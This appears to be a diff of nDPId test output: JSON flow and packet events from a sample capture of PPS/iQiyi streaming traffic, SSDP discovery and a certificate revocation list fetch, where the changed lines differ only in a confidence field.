-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353166729,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":694,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":694,"pkt_l4_len":660,"thread_ts_msec":1467353167288,"pkt":"TF4M6gNlABxCjnAxCABFAAKoG9BAAIAGqFHAqHMIJG7cD8VCAFB9qW\/gOgaPJFAY\/\/DRFwAAR0VUIC90bXBzdGF0cy5naWY\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"} 
-01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7580000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1467353167373,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353167373,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5WoJAAC4GvY4kbtwPwKhzCABQxUI6Bo8kfalyYFAYPAD9ZAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1467353170523,"pkt":"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"} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} 
+01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7580000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1467353171307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353171307,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FgtAADMGd2lvzhZMwKhzCABQxUNAfXm33UKQZVAYACEI\/gAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1467353172446,"pkt":"TF4M6gNlABxCjnAxCABFAAETH7ZAAIAGCbLAqHMIFymFo8VEAFBenvyU0fNBYlAYAQQxqAAAR0VUIC9wY2EzLWc1LmNybCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCklmLU1vZGlmaWVkLVNpbmNlOiBUaHUsIDI0IE1hciAyMDE2IDE3OjQwOjA1IEdNVA0KSWYtTm9uZS1NYXRjaDogIjE3MjE5NjllNzMyYmNmZGRhNGQ4NWMxNjM5MGViYTcwOjE0NTg4NDI1OTciDQpVc2VyLUFnZW50OiBNaWNyb3NvZnQtQ3J5cHRvQVBJLzYuMQ0KSG9zdDogczEuc3ltY2IuY29tDQoNCg=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7580000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} 01506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1467353172450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":839,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":839,"pkt_l4_len":805,"thread_ts_msec":1467353172450,"pkt":"ABxCjnAxTF4M6gNlCABFAAM59KBAADkGeaEXKYWjwKhzCABQxUTR80FiXp79f1AYA7JdXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZQ0KRVRhZzogIjM2ZGFiMGNkZDA1ODVlZmNmMjhlYjY3NzRhZWVlOTJhOjE0NjY3OTc4MTQiDQpMYXN0LU1vZGlmaWVkOiBGcmksIDI0IEp1biAyMDE2IDE5OjUwOjE0IEdNVA0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoxMSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA1MzMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vcGtpeC1jcmwNCg0KMIICETCB+jANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMTowOAYDVQQLEzEoYykgMjAwNiBWZXJpU2lnbiwgSW5jLiAtIEZvciBhdXRob3JpemVkIHVzZSBvbmx5MUUwQwYDVQQDEzxWZX
JpU2lnbiBDbGFzcyAzIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzUXDTE2MDYyMzAwMDAwMFoXDTE2MDkzMDIzNTk1OVowDQYJKoZIhvcNAQEFBQADggEBAEI97eVcH1DiB1\/0Bno6J+K8HusVe3cUvr5+fyScH1zXRcf7c5djWYgN+SuML4v70NdV\/FuJwb2d1nTAPxF1qboQaHggi98zdzXj8RwrHgS5mm8yRgjh5Xn7nIaC171csZuQguJ7tmZuJ7r76UMkne0JyJ14wsSf90xX+g\/a\/dFyP90Y6ni5xSPgpc8d3Zgw\/EfU0UQm\/T+f09jhD1\/1X6BOBM7pQUZMpb0wu+RThkQxkoU7zdqSaSWoF1RKiDChBGCnoysqx+p1d9U16eVsZvZ0VQEVpSaXicfzrXu+tMxjeZnFuPSglD2NZ6ZxRQtvm2pR35dtCeWkmxI8I6zBG3M="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353172912,"pkt":"TF4M6gNlABxCjnAxCABFAAOkIBFAAIAGyjnAqHMIymwO7MVFAFDpA4X9\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"} 
-01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1467353173018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353173018,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5BZNAADMGNKPKbA7swKhzCABQxUX+SRXJ6QOJeVAYACCXCgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1467353179045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353179045,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6EAAAER3+LAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1467353180202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180202,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJdtAAIAGxG7AqHMIymwO7MVFAFDpA4l5\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"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180357,"pkt":"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"} 
-01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 